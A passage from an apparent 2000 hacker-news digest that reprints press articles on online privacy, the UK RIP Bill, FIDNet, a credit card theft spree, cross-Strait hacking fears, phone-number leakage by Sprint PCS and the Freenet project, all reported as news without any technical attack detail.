Chelsea,'' the president said after a speech Friday. ``Absolutely not -- I don't think it's secure.'' That's a shame for the first family, which is clearly in a category by itself when it comes to security. But in an odd way, the rest of us can draw some comfort from Clinton's worries. When online privacy becomes a personal issue for the president of the United States, maybe we're closer to a day when privacy will reach the position it deserves on the public agenda. Clinton elevated the subject in his remarks to the Aspen Institute's Forum on Communications & Society, which met in San Jose on Friday. He spoke of the genuine, justified angst gnawing at regular folks who don't trust businesses and governments to keep their most personal information private. Trust is earned in this world. There are some responsible members of the online community, companies and sites that go to great lengths to protect the privacy of Web surfers and shoppers. But the bad actors, who troll for personal information so they can manipulate and trade it, mock the self-regulation so many in the Net community say is the answer. So when Clinton called -- albeit tentatively -- for laws protecting the privacy of individuals' online medical and financial information, as well as all children's activities, he surely struck a resonant chord with average people. A zone of privacy is central to the American way of life, he said with absolute accuracy, ``and we give it up at our peril.'' Welcome words. But they come in a context that invites some skepticism. The Clintons could enjoy an entirely private e-mail correspondence right now. They'd need to use strong encryption, the scrambling of data so that it can't be understood even if intercepted. But this president, taking the advice of law enforcers and spies, has done everything in his power to discourage the widespread use of strong encryption. He constantly uses strong encryption in his voice and data communications with military officials, no doubt, but the fact that he apparently hasn't even considered it for family e-mail is testament to the government's paranoia that regular folks, not just criminals, might truly protect their own privacy in this way. His other problem is part technical and part social. The president would have to trust that someone wasn't reading his daughter's e-mail once it had been unscrambled on her computer, either over her shoulder or by jacking into that computer through the network to which it's attached. He surely trusts his daughter. But as he also noted in his speech Friday, it's unclear whether any of us can trust the network. The tech industry has some distance to travel in that direction. The administration has also been tone-deaf -- and that's a charitable description -- to civil liberties. This president and his top appointees have again and again supported legislation that has eroded the Bill of Rights and other fundamental liberties. In the privacy arena, too, the Clinton team has been less than faithful to the notions the president floated on Friday. When it issued regulations about the privacy of medical records last fall, the administration talked a great game. But the fine print didn't match the rhetoric. The White House record on financial data doesn't give privacy advocates the warm and fuzzies, either. It has, for example, carried water for big business by lobbying against the European Union's worthy efforts to apply its data-privacy laws to American companies doing business in Europe. Meanwhile, the administration has been the chief cheerleader for the discredited notion that industry can regulate itself on these matters. Clinton offered a politician's hedge even as he pushed privacy. We don't want to kill the golden goose of technology, he said, implying that ensuring privacy rights could be so bad for business that we might have to abandon the idea. That said, there was genuine progress in Clinton's words Friday, a day after DoubleClick Inc., the Internet-advertising company, loudly postponed plans to expand its business in ways that amounted to unprecedented surveillance of individual Web users. I wonder if the timing was entirely a coincidence. The president's chief achievement Friday was to put the issue in the context of real people -- that is, real voters whose worries become the worries of politicians who want to be elected or re-elected. Even in an era when ``one person, one vote'' has morphed toward the sickening notion of ``one dollar, one vote'' the concerns of real people do matter. Let's assume the administration will push the right kind of laws. Will Congress act? I asked him that question after the speech. ``I kind of think we'll get legislation this year,'' Clinton said. Dan Gillmor's column appears each Sunday, Tuesday and Friday. Visit Dan's online column, eJournal (weblog.mercurycenter.com/ejournal). E-mail: dgillmor@sjmercury.com; phone (408) 920-5016; fax (408) 920-5917. PGP fingerprint: FE68 46C9 80C9 BC6E 3DD0 BE57 AD49 1487 CEDC 5C14. @HWA 130.0 HNN:Mar 7th:FidNet is Not Enough ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Testifying before the Senate Governmental Affairs Committee Government and Defense Information Systems Director Jack Brock, said that the NIPC plan of a Federal Intrusion Detection Network is flawed. He went on to say that good security is a direct result of good information management and that band aid solutions such as FidNet will fail unless management is fixed. The Register UK http://www.theregister.co.uk/000306-000025.html SATURDAY MARCH 11TH 2000 Posted 06/03/2000 8:44pm by Thomas C. Greene in Washington Congressional study rejects Clinton's IT security Czar, FIDNET The President's scheme to bolster US government computer security by appointing an information security Czar, and developing an automated monitoring system to expand intrusion detection known as FIDNET, is misguided, General Accounting Office (GAO) Government and Defence Information Systems Director Jack Brock told Congress last week. "The specific criticism we have of the President's plan is that it focuses so much on intrusion detection you begin to get the impression that it was the primary means they have of improving the federal government's computer security programme," Brock said in testimony before the Senate Governmental Affairs Committee. The GAO is an investigative body which reviews and audits the federal bureaucracy on behalf of Congress. It recently looked into computer and information security procedures in numerous government bureaus. The investigation revealed widespread security failures, most of which derive from poor management. One doesn't find an agency with good information management and bad security, just as one never sees an agency with poor management and good security, Brock observed. Allowing the Clinton Administration to address computer security as an individual element of federal information management would be a mistake, he insisted. Intrusion detection alone will do nothing to prevent data security being compromised in the first place. A far more holistic approach is needed, Brock believes. "One agency that we've gone to at [the Environmental Protection Agency] did a pretty good job of reporting and recording intrusions; but they did a very bad job of doing anything to prevent those intrusions, or analyzing those intrusions to take corrective action," Brock recalled. In spite of the GAO's wisdom, the President last week ordered a review of every federal agency to determine their vulnerability to cyber attack, which will be administered by White House Chief of Staff John Podesta. The prevention of distributed denial of service (DDoS) attacks "to make sure that federal computers cannot be used by outsiders to attack others" would be a priority, Clinton said. The Clinton Administration appears to be indulging federal law enforcement agencies which prefer an emphasis on intrusion detection and response, simply because it assures them an increasingly prominent role in national cyber security matters. Obviously, if intrusion prevention were to improve dramatically, the Department of Justice (DoJ), the FBI, and the National Infrastructure Protection Center (NIPC) would have less justification to muck about in cyberspace. This would result in some reduction of bargaining power to attract federal funds for cyber crime initiatives, to obtain expanded powers of surveillance on line, and to reduce opportunities for Netizens to surf the Web in complete anonymity, all of which are among the DoJ's highest priorities right now. The Register foresees little trouble for the DoJ in realising its ambitions, however. Having observed the pace of common-sense innovation among US government bureaus for several years now, we make it a safe bet that a significant erosion of on-line privacy and liberties will have taken place long before Uncle Sam stops making network intrusions a matter of child's play. � @HWA 131.0 HNN:Mar 7th: RIP Bill Comes Under Fire In UK ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lady Sharrow The latest phase of making the UK the most tightly regulated country in the world takes place today. If enacted the Regulation of Investigatory Powers (RIP) Bill would give far reaching powers to the government and its agencies to snoop on private individuals. All UK readers are urged to lobby their MP's to retract this bill and implement the original freedom of information bill the government promised. The Register UK http://www.theregister.co.uk/000306-000020.html Wired http://www.wired.com/news/politics/0,1283,34776,00.html The Stand - Campaigning For Safe E-Commerce Legislation http://www.stand.org.uk/ Posted 06/03/2000 4:39pm by Tim Richardson Opposition mounts against UK's Big Brother Bill Parliament is today debating plans which will massively extend Government snooping powers in Britain. If adopted, the Regulation of Investigatory Powers (RIP) Bill would give the Government the green light to snoop on private emails and mobile phone conversations. Those backing the Bill say the new measures simply bring new communication technologies in line with regulations governing traditional telephony services. STAND.org.uk e-democracy campaigner Danny O'Brien said: "This Bill contains ill-conceived proposals that will seriously damage UK ecommerce, as well as threaten some basic civil liberties. "Since the Government is trying to rush this legislation through Parliament, we decided to use the Internet to speed up our campaign to amend the worst bits of the Bill," he said. STAND.org.uk has set up a WebFax service to enable Net users to lobby their MP against the Bill. Follow the link above and you can participate in this exercise in mass democracy. Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties (UK), said: "The RIP Bill is complex in nature and with its current state, there remains serious problems with its compatibility with the Human Rights Act 1998. "If enacted in its current form, it would only establish an intimidating environment for the legitimate use of encryption products by the UK citizens. "Such legislation would no longer be compatible with the government policy to make Britain the best place for ecommerce and network development. The RIP Bill would be the first step towards the creation of a very hostile place for network development. "We cannot support such proposals, which we believe would be a serious curtailment of important and well-established civil rights," he said. Today the House of Commons is engaged in the second reading of the RIP Bill. The Government hopes it will become an Act by October 2000. � -=- Wired; U.K. Crypto Law a Key Issue by Alan Docherty 3:00 a.m. 7.Mar.2000 PST LONDON -- Law enforcement officials speaking to the House of Commons said criminals were using the Internet and without new powers those crimes would go undetected by police. Their comments came Monday as home secretary Jack Straw announced the second reading of the Regulation of Investigatory Powers Bill. The measure would update legislation and give more power to law enforcement agencies to intercept electronic communications. Opponents claimed specific sections of the updated legislation made users guilty until proven innocent. Opposition speaker Ann Widdecombe, shadow home secretary, said the bill had good parts and the Conservative Party accepted the need to regulate surveillance. However, Section 49 of the bill was, considered unacceptable by Widdecombe and many others. The section enables law enforcement agencies to serve notices demanding that intercepted emails be decrypted. The bill puts the onus on Net users to prove they do not have the key or have lost it. Simon Hughes, health and social welfare spokesman for the Liberal Democrats, also supported the need for a new bill, but asked that the legislation have a more even balance between the power and rights of the state and the power and liberties of individuals. He said that in the current bill the government had gone too far. Widdecombe said she thought the bill was "probably in breach of the ECHR (European Convention of Human Rights)." Yaman Akdeniz, director of Cyber Rights & Cyber Liberties agreed the bill was likely to breach the ECHR and that unless it was changed, it would make the UK an undesirable location for e-commerce. The Labour government has set the target of making the UK the best environment for electronic business by 2002. Caspar Bowden of the Foundation for Information Policy Research was hopeful the Home Office would consider the arguments from opposition and back bench Labour MPs. "Government was clearly surprised by the breadth and force of objections to the structure and details of almost every part of the bill," Bowden said. "We will have to see whether they respond positively to these powerfully expressed criticisms during the amendment phase." Internet Freedom's Chris Ellison was less hopeful. "The RIP Bill does nothing to regulate the powers of the police. Rather it extends them," he said. "The real victims will not be criminals who become Net users, but Net users who will become criminals as a consequence of the removal of their presumed innocence." @HWA 132.0 HNN:Mar 7th:Curador Returns With More CC Numbers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Claiming he has been on vacation for the past week or so Curador has returned and now boasts more than 23,000 credit card numbers that have been lifted from at least eight different e-commerce sites. At several of the sites Curador has used a security hole in Microsoft's Internet Information Server software which allows the download of customer transaction records. Microsoft created a patch for the hole in 1998. USA Today http://www.usatoday.com/life/cyber/tech/cth502.htm
@HWA 133.0 HNN:Mar 7th:Taiwan Fears Computer Attack From China ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse The head of Taiwan's National Security Bureau information division, Chang Kuang-yuan, said that while there was no evidence of a planned attack, the island's computers should be well protected for such an eventuality. It is feared that China may attempt to disrupt Taiwan's March 18 presidential election with various cyber attacks. Virtual China http://www.virtualchina.com/news/mar00/030700-hacker-alo-jsl.html Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000307/wr/taiwan_internet_1.html VC; Taiwan Warns of Possible Computer War with Mainland By ALEXA OLESEN (Virtual China News -- Mar. 7) As China continued to sabre rattle in the run-up to Taiwan's second democratic elections, scheduled for Mar. 18, a Taiwanese official warned Monday that the island's computer systems may be at risk of being attacked by mainland Chinese hackers. Chang Kuang-yuan, head of Taiwan's National Security Bureau information division said that while there was no evidence of a planned attack, the island's computers should be well protected for such an eventuality. "No hacking at the moment does not suggest the possibility should be ruled out," Chang was quoted as saying by the Agence France Presse. Cross-Strait hacking fears were made a reality last fall when hundreds of attacks on Taiwanese computers were traced to computers on the mainland. The attacks ranged from sabotage, through the introduction of computer viruses, to the alteration of Web site content. Some were instigated by comments made by Taiwanese President Lee Teng-hui's calling for a state-to-state relationship between China and Taiwan. Taiwanese hackers responded in kind by hacking into mainland Chinese sites and posting the Taiwanese anthem and the Taiwanese flag. Chang told the press last year that the Taiwanese National Security Bureau had discovered 165 mainland Chinese Web sites as the sources of 72,000 instances of hacking following Lee Teng-hui's comments. Victims of the attacks included Taiwanese government agencies such as the Pingtung County government Web site and the Construction and Planning Administration, as well as the Web sites of several universities. While some of those Web sites were government-operated it was unclear whether or not the hack attacks were orchestrated by the Chinese government or individual hackers according to Chang. Playful Individuals "I think this is more of a side show than actual strategy on the part of mainland," said Stephen Yates, Senior Policy Analyst at the Heritage Foundation, a U.S. think-tank. "Recent hacking incidents are probably the work of playful individuals ... very intelligent and creative college students similar to the kind of people who would hack into a Pentagon Web site and put up 'No Nukes'," Yates said. Media reports, pro-Taiwan forces in the U.S., and Taiwanese officials have stressed Beijing's role in the hack attacks because they were traced to mainland computers and seemed to be conducted en masse. Observers also reason that because mainland China so closely regulates and monitors its computer network activity only government-sanctioned hackers would be able to accomplish Cross-Strait computer sabotage. However Chinese military expert James Mulvenon says that argument is seriously flawed and that anyone in China with computer access and the technical know-how could easily accomplish last August's hacking. "I've been in cybercafes in China. They don't enforce any regulation on registration," said Mulvenon, an associate political scientist at the Rand Corporation, another U.S. think-tank. "There are hacker tools sitting on the [computer] desktop and illegal proxy servers already installed. The network environment is wide open. It's not well controlled," he said. Heightened Awareness Experts say that hack attacks should be distinguished from Cross-Strait Information Warfare contingencies that both Taiwan and China are preparing for. Information Warfare is the offensive and defensive use of information and information systems to deny, exploit, corrupt, or destroy, an adversary's information, information-based processes, information systems, and computer-based networks while protecting one's own, according to Ivan K. Goldberg, the Director of the Institute for the Advanced Study of Information Warfare (IASIW). Chinese military officials have begun to regularly refer to the need for network security and recent regulations regarding the transmission of state secrets evidenced a heightened awareness to network computer espionage. Taiwan also has made similar statements. "China has put a lot of effort into building up its information capabilities in the past decade," Lin Ching-ching, the director of Taiwan's Electronic Communications and Information Bureau told reporters last August. "But Taiwan is also working on it. We are not as fragile as many people think," he said. Taiwan's response to the August hack attacks was decidedly military in nature, despite the fact that there was no evidence that Beijing was behind them. In September, Taipei announced that it was stepping up its military training to better defend itself against any electronic warfare by China. The Taiwanese defense ministry went so far as to institute nine seminars focused on communication security and computer virus prevention. High Risk, Low Gain However, hacking is different from that level of Information Warfare. "There are no doubt real plans to make [computer network infiltration] an operational capability on both sides, but neither would want to demonstrate that capability. There is no incentive for them to show their hand," said Stephen Yates. Mulvenon echoed Yates' argument and added that not only would China be reluctant to show its cards but that it would also be tough for Beijing, as it would be for others, to have a very strong hand regarding Information Warfare. "People talk very glibly about Information Warfare against Taiwan but it's enormously difficult," Mulvenon said. "It's high risk and low gain, with a high blowback potential if it fails or you get caught. I would think they would feel more comfortable with ballistic missiles." Mulvenon did not fully discount Beijing's role in cross-Strait hacking, however. Admitting that there was no direct evidence indicating that the hack attacks were planned by the Chinese central government, he suggested that they could have been used as a handy diversion "A reasonable hypothesis is that Beijing exploited teenage hooliganism by using that as a cover for carrying out interesting intelligence gathering," said Mulvenon. Taiwan, which split from the mainland in 1949 following a civil war is considered by Beijing to be a renegade province. Current mainland Chinese policy dictates that any moves by Taiwan toward being recognized internationally as an Independent nation will be countered with military attack. To reach Alexa Olesen: alexa@virtualchina.net -=- Reuters; Tuesday March 7 5:01 AM ET Taiwan Says Ready If China Launches Internet Attack TAIPEI, Taiwan (Reuters) - Taiwan's military said on Tuesday it has set up Internet defenses in the run up to the March 18 presidential election after discovering more than 7,000 attempts by Chinese hackers to enter the country's security systems. ``We have set up a round-the-clock monitor system and installed various security programs and firewalls to keep the Chinese Communists from trying to disrupt our networks,'' said Chang Chia-sheng, the defense ministry's cyber information head. The military and security networks are independent with no links to the Internet, making it difficult for Chinese hackers to sabotage, Chang said. Taiwan's security authorities have discovered more than 7,000 recent attempts by Chinese hackers to enter the island's security and military systems through Internet Web sites, Chang said. He did not elaborate. A cyberwar between Taiwan and Chinese hackers broke out last year after Taiwan President Lee Teng-hui called in July for bilateral ties to be conducted on a ``special state-to-state'' basis, infuriating Beijing. China has heaped verbal threats, including Internet propaganda, in a veiled warning against voting for pro-independence opposition candidate Chen Shui-bian in the elections. Chang said China was technically capable of paralyzing the island's computer networks, including the system at the vote tabulation center on election day, if it wanted to disrupt the polls, but said such a move would be difficult. ``Theoretically, it is possible, but it won't be easy,'' Chang said. China could swamp Taiwan government Web sites with huge megabytes of electronic mail or e-mail bombs to overload them, he said. ``But we can always refuse access to our Web sites from any suspicious Internet providers once we discover unusual access movements,'' Chang said. Besides, Chang noted, Taiwan's vote tabulation network was independent of the Web site of the Central Election Commission, making it difficult for hackers to use the Web site to attack the vote network. Beijing regards Taiwan as a wayward province and has threatened to invade if the island declares independence. @HWA 134.0 HNN:Mar 7th:Hong Kong Beefs Up Online Police Presence ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Police Training School in Hong Kong has started teaching police officers how to fight computer crime. The Commercial Crime Bureau will increase staff of the computer crime section from 17 officers to at least 20 and each of the 45 police divisions will have at least one computer crime trained officer assigned. South China Morning Post http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000306014052057.asp Monday, March 6, 2000 Police step up war on cyber crime MICHAEL WONG At least one officer with computer-crime knowledge is to be drafted to each of the 45 police divisions as the problem grows. The Police Training School has started teaching trainee constables and inspectors how to fight computer crime. The computer-crime section of the Commercial Crime Bureau will increase staff from 17 officers to at least 20. With Internet use growing worldwide, the force needed to improve its ability to counter computer crime, said bureau Senior Superintendent Peter Else. Figures from the Office of the Telecommunications Authority show that the estimated number of Internet accounts grew from a little more than one million in June last year to 1.86 million by the year's end. The number of computer crimes grew from 25 in 1997 to 38 in 1998 and 266 last year. These crimes included unauthorised access, Internet shopping fraud, publication of obscene material and criminal damage. The bureau received 84 requests for computer forensic examination last year, up from 60 in 1998. Mr Else said other types of computer crime such as criminal intimidation and "pump and dump" were emerging fast. In "pump and dump", so far detected mainly in the United States, criminals buy junk bonds and shell companies' stocks at a minimal price and persuade Web site visitors to purchase them. "Once their value has gone up, the criminals sell their own stocks for a profit," he said. Since most crimes on the Internet could also be committed in the "real world", users must use the same degree of alertness in the cyber-world, said Mr Else. With greater awareness and understanding, particularly by courts, about the seriousness of the problem, Hong Kong was in a position to tackle computer crime, he said. Through regular meetings with the Department of Justice, heavier penalties have been handed out in court cases. "The courts have shown already that other legislation applies on the Internet as well," he said. "And, secondly, they're more than happy to give some fairly hefty sentences." @HWA 135.0 HNN:Mar 7th:ATM and Frame Relay Vulnerable to Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse The Yankee group has said that ATM and Frame Relay Networks are extremely vulnerable to security breaches. ASPs, network carriers and other corporations will spend $60 and $500 million between now and 2004 to add encryption to their networks. TechWeb http://www.techweb.com/wire/story/TWB20000306S0005 ATM, Frame Relay Data Networks Insecure (03/06/00, 12:07 p.m. ET) TechWeb ATM and frame relay data networks are highly vulnerable to security breaches, researcher Yankee Group said Monday. ATM and frame-relay data network carriers, application service providers and hosting providers, and corporations will spend $60 million this year and up to $500 million globally in 2004 to add encrypting hardware and software to counteract transport security threats. @HWA Briliant! (Do these people get paid??) - Ed 136.0 HNN:Mar 8th:EFF Looking For Lawyers For DeCSS Case ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Motion Picture Association has retained the services of the prestigious New York law firm of Proskauer Rose to handle its side of the DVD DeCSS case. The Electronic Frontier Foundation is still searching for a New York based firm that will handle the case without breaking the bank. The EFF is attempting to use 'open law' as one alternative but is having little success. Wired http://www.wired.com/news/politics/0,1283,34720,00.html U.S. Wants to Trace Net Users by Declan McCullagh 3:00 a.m. 4.Mar.2000 PST WASHINGTON -- The ease of hiding one's identity on the Net is giving police migraines and justifies providing broad new powers to law enforcement, the White House says in a forthcoming report. The federal government should take steps to improve online traceability and promote international cooperation to identify Internet users, according to a draft of the report commissioned by President Clinton and obtained by Wired News. Police should be able to determine the source of hacker attacks or "anonymous emails that contain bomb threats," states the 200 KB document prepared by a high-level working group chaired by Attorney General Janet Reno. Although the report was largely complete before last month's prominent denial-of-service attacks, it will likely influence the debate over how the U.S. government should respond to them. The FBI has not made any arrests during its investigation, and bureau officials Tuesday told Congress that anonymity and the global nature of the Internet pose serious problems. A White House spokesman said the report is being finalized and "should be released very soon." The Working Group on Unlawful Conduct on the Internet, which Clinton created in August 1999 to consider new laws or educational programs, includes senior administration officials such as FBI Director Louis Freeh, Treasury Secretary Larry Summers, Commerce Secretary William Daley, and representatives from the military, DEA, and Secret Service. The group focused on what it views as the problem of anonymity, citing "the need for real-time tracing of Internet communications across traditional jurisdictional boundaries, both domestically and internationally [and] the need to track down sophisticated users who commit unlawful acts on the Internet while hiding their identities," according to the report. Currently no laws require Internet users in the United States to reveal their identities before signing up for accounts, and both fee-based and free services offer anonymous mail, Web browsing, and dialup connections. Internet service providers should be encouraged, though not required, to maintain detailed records of what their users are doing online. "Some industry members may not retain certain system data long enough to permit law enforcement to identify online offenders," the report says. But providing police with increased abilities to trace users raises thorny legal and technical questions, and civil libertarians on Friday questioned whether it would violate privacy rights protected by the Constitution. A 1995 Supreme Court decision, McIntyre v. Ohio Elections Commission, upheld a right to anonymous political speech. "This is the nutty kind of stuff that's produced by people who meet in closed rooms without windows," said Marc Rotenberg, director of the Electronic Privacy Information Center. David Banisar, co-author of The Electronic Privacy Papers, said the administration unwisely "wants to make it easier to obtain people's identities, trace their movements online, and apply wiretapping to the Internet." The report says anonymous remailers can be used to protect the privacy of dissidents in oppressive countries, but also can frustrate police who can't figure out who sent the message. "To be sure, individuals can generally engage in many 'real world' activities relatively anonymously, such as making small cash payments and attending public events. But they cannot remain anonymous in other contexts, such as opening a bank account or registering a car," the report says. "Indeed, many financial institutions have substantial customer identification requirements." Response to the proposal among House Republican leaders was cautious. "We need to make sure this isn't used as an excuse to set up a big brother monitoring program. 'Real-time tracing of Internet communications' sounds an awful lot like a proposal to put backdoors in the latest revision of the Internet protocol itself," said Richard Diamond, a spokesman for House Majority Leader Dick Armey. "Obviously we need to be able to track down those who would use the Internet to commit crimes, just as if they had used a telephone to do the same," he said. "Let's just keep things in perspective." The White House report cites the PairGain case, in which a stock manipulator posted a fraudulent Bloomberg article in an attempt to drive the company's share prices up. The report also says that Congress should consider approving a law to remove some privacy protections from journalists and publishers. "With the advent of the Internet and widespread computer use, almost any computer can be used to 'publish' material," says the draft document, which also recommends reduced privacy rights for cable modem users. During a White House summit with industry leaders last month, Clinton denounced the recent denial-of-service attacks but cautioned against overreaction. The FBI and Justice Department have long opposed untraceable Internet use. "I think we are perilously close to a lose-lose situation in which citizens have lost their privacy to commercial interests and criminals have easy access to absolute anonymity," Justice Department prosecutor Philip Reitinger said on an MIT panel last April, according to The New York Times. The FBI's Freeh told Congress much the same thing when he testified during an appropriations hearing last year. @HWA 137.0 HNN:Mar 8th:Cell Surfing Not Anonymous Either ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Wireless Internet is the hot new feature in cell phone technology but some companies may be violating users privacy. Sprint PCS and possibly other companies embed users phone numbers inside the request for every page viewed. Sprint says that the use of phone numbers in this manner is clearly spelled out in its license agreement. (Look at the fine print, It's Huge!) SF Gate http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/07/BU94577.DTL Concern Over Cell Surfing Sprint phone reveals number to Web sites Todd Wallack, Chronicle Staff Writer Tuesday, March 7, 2000 Kevin Manley has no problem giving his name and address to Web sites like Amazon.com when he needs to buy a book. But Manley, a Seattle software developer, was stunned to discover recently that his Sprint PCS cell telephone automatically transmits his phone number to every Web site he visits using Sprint's new wireless data service. ``I was surprised,'' Manley said. ``If I'm just surfing the Web without purchasing something, I expect to remain anonymous.'' Manley isn't alone. It turns out that Sprint PCS, and possibly some other wireless companies, routinely embed customers' phone numbers in Web page requests, raising concerns about whether these companies are doing enough to safeguard users' privacy. ``People don't want to be automatically identified in cyberspace, any more than they want to wear bar-coded name tags as they walk down a city street,'' said Jason Catlett, president of JunkBusters, an anti-marketing group. Privacy advocates said they worried that Web sites could potentially forward users' cell phone numbers to their sales department for follow-up calls. Or dot-com companies could use databases to match surfers' phone numbers with their name, address and other personal information. ``Just what we all need, more telemarketers calling us!'' said Richard Smith, a Massachusetts programmer who first verified that Manley's problem affects other Sprint PCS customers. Although relatively few customers now use cell phones to surf the Web, the issue could become increasingly important as millions of Americans take advantage of the technology in coming years. Sprint just started its service in the United States in September and other major carriers like Bell Atlantic and AirTouch Communications have since followed suit. AT&T has been tinkering with the technology for several years, though it's only recently targeted the mass market. But Sprint PCS spokesman Tom Murphy downplayed the privacy fears. He pointed out that users routinely hand personal information to online retailers when they buy a book or plane ticket. Those Web sites can then instantly recognize users when they return by depositing a small file on users' hard drive called a ``cookie.'' In addition, Sprint said it notifies customers that their phone numbers will be sent to Web sites in its service agreement, posted on its Web site. But Manley complained that the sentence is buried in the nearly 6,000-word document. He said he only happened upon the problem while trying to figure out how the cell phone worked, using it to surf his own Web server and then analyzing Web page requests. It's also possible that other phone companies' customers are affected by the privacy hole. That's because most of Sprint's rivals use the same microbrowser, developed by Redwood City's Phone.com, which boils down Web sites so they can be read through a cell phone's tiny screen. Because of the way the software works, Phone.com requires wireless companies to use a unique ID number for each user when they request a Web page. For obvious reasons, the phone number is the simplest to use. But Ben Linder, Phone.com's marketing vice president, said it recommends phone companies alter the phone number in some way so Web sites can't use the number to call or identify surfers. Indeed, Bell Atlantic said it does just that. ``We did this intentionally to provide a privacy barrier for our customers,'' said Bell Atlantic spokesman Jim Gerace. ``What you sacrifice is a little bit of speed, but essentially the user doesn't recognize that big a difference.'' AirTouch Communications said it drops customers' phone numbers altogether, and simply passes along a random number to the Web site. In addition to the privacy issues, AirTouch said there is another reason to safeguard cell phone users' phone numbers. Like many state-of-the-art pagers, cell phones with browsers are capable of receiving instant text messages called alerts. But if someone were able to obtain a list of cell phones with the feature, they could potentially blanket them with unsolicited ads, similar to junk e-mail and faxes. ``By giving out someone's phone number, you open up the door to alert messages,'' said John Rizzo, an AirTouch software engineer. Though Rizzo said he doesn't believe spammers have started hitting cell phones yet, he said ``the potential is there.'' AT&T declined to say whether it automatically gives out customers' phone numbers to the Web sites they browse. Spokesman Ken Woo would only say that ``it's not an issue'' because the company hasn't received any complaints. But Manley, the Seattle software developer, said customers typically have no way to know when their phone numbers are transmitted to Web sites. ``The reason nobody (else) complains is because they don't realize their privacy is being violated.'' Even so, Manley said he will continue to use his Sprint phone to surf the Web. ``It's an annoyance,'' he said, ``but the convenience of being able to use the phone to browse is so much.'' �2000 San Francisco Chronicle Page E1 @HWA 138.0 HNN:Mar 8th:Freenet Promises True Free Speech ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Still in beta stages a new network known as Freenet hopes to provide even more privacy and anonymity to users. Without centralized control Freenet would have no IP addresses or DNS making it extremely difficult to censor information. With no way to identify users some advocates feel that the network would be a haven for software and multimedia pirates. Wired http://www.wired.com/news/technology/0,1282,34768,00.html Freenet http://freenet.sourceforge.net Wired; Alternative Net Protects Pirates by Leander Kahney 3:00 a.m. 8.Mar.2000 PST Open-source advocates are developing an alternative publishing network that promises to provide true anonymity in sharing documents and files over the Internet. But in addition to protecting free speech, the new system also could be a boon for multimedia pirates. Freenet is an open-source file-transfer system similar to the Web for sharing digital content such as HTML pages and MP3 music files. It will be run by connected clusters of servers or node stations that could in turn be run on almost any PC connected to the Internet. But unlike the Web, Freenet has no centralized administrative infrastructure of domain name servers (DNS) and IP addresses that can be used to track users. Hosting and replicating documents and files requires that Freenet backers volunteer their time and resources. Because Freenet aims to be anonymous, secure, and without centralized control, it would make it almost impossible to trace people who post content -- legal or otherwise -- onto the network. "My primary motivation was to make it very difficult to censor information," said Ian Clarke, an Irish programmer who designed the system. "With the Internet there's the potential to censor and monitor people to a degree that's never been possible before. I wanted to develop the technology to make this impossible." Clarke started work on Freenet 18 months ago as a graduate student in artificial intelligence at Edinburgh University. He had been outraged by the Australian government's proposal to introduce sweeping censorship laws, which went into effect in January. Clarke hopes to launch the first public version in the spring, but he said the system is still pretty rough. The server is nearly finished, but so far there are no browsers, or clients, to make the network easy to use. Freenet software will be released under the GNU public license, which will allow anyone to freely distribute and change the source code. The system is being written in Java by about a dozen programmers internationally. They have never met nor even spoken over the phone -- all communication is by email, Clarke said. Both authors and readers can choose to be anonymous if they so wish, Clarke said. Like the Web, the network is navigated by a client, or browser. He said it will even be difficult to determine if someone is running a Freenet server and what information is being stored on it, Clarke said. Alex Fowler of the Electronic Frontier Foundation said that while he generally supports anti-censorship tools, Freenet could create as many problems as it solves. Fowler said that Freenet could be a useful tool in countries like Singapore or China that censor the Net or quash free speech. But he doesn't like the idea that you wouldn't be able to remove sensitive information -- such as someone's medical records. "There's no way to tell if a project like this will actually take off," he said. "It�s certainly going to raise some questions with a whole lot of people. Not just copyright holders, but governments too." Patrick Ball, deputy director of the Science and Human Rights Program with the American Association for the Advancement for Science, said tools like anonymizers, strong cryptography, and Freenet tend not to help activists who are not already under surveillance because using them is in itself suspicious and tends to alert the authorities. "I�m for any application that protects dissidents," he said. "But there�s a higher order problem that�s very difficult to get around, and that�s by using these tools you draw attention to yourself." Although Clarke designed Freenet to protect free speech, he thinks that the safeguards they are building in to make it difficult to track down those who distribute content could lead to its notoriety as a vehicle for copyright piracy. The system was designed to make it impossible to find out where files are physically stored. Information posted to the network is stored on multiple servers simultaneously, making it difficult to remove a file. In fact, Clarke said any attempt to remove information causes it to be copied to other servers on the network. The only way to remove information is to disable the entire network, which may prove difficult if it becomes popular and is running on thousands of PCs all over the globe. However, Clarke said the network cannot be guaranteed to permanently store information. Only popular files survive for any period of time. Older, unpopular files would be overwritten by more popular ones. "As a project we don't want to be labeled as hackers who distribute warez or copyrighted material," he said. "The purpose of Freenet is to promote freedom of information, but there is an inevitable consequence there that it might lead to violation of copyright law." "The potential for protecting freedom of speech is more important than protecting copyright, which is an economic tool," Clarke added. Clarke noted that Freenet can be functionally identical to Napster, the wildly popular network for sharing music online. But while the Recording Industry Association of America is currently seeking a court order to shut down Napster's central servers, it would be almost impossible to disable a Freenet network running on machines all over the world. "Because it's decentralized no one can be held responsible for it," Clarke said. "Once it's released there's no point coming after me because there's nothing I, nor anyone else, can do to shut it down." Eric Scheirer, a music technology researcher at MIT's Media Lab, said Freenet is an interesting 